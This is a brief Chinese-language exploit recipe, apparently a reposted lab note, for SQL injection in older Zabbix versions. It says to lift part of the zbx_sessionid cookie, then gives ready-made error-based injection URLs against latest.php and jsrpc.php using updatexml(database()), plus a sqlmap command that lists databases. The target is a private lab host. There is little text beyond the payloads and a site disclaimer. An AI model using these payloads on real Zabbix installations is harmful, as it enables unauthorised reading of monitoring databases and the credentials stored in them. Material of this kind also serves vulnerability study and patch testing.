Zabbix 2.2.14之前的版本和3.0.4之前的3.0版本
latest.PHP页面
提取cookie中的zbx_sessionid的后16位
246c58ba963457ef
http://192.168.49.2:8080/latest.PHP?output.PHP=ajax&sid=246c58ba963457ef&favobj=toggle&toggle_open_state=1&toggle_ids=updatexml(0,concat(0xa,database()),0)
http://192.168.49.2:8080/jsrpc.PHP?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,database()),0)
sqlmap -u "http://192.168.49.2:8080/jsrpc.PHP?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1234" -p "profileIdx2" --technique E --dbs
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。
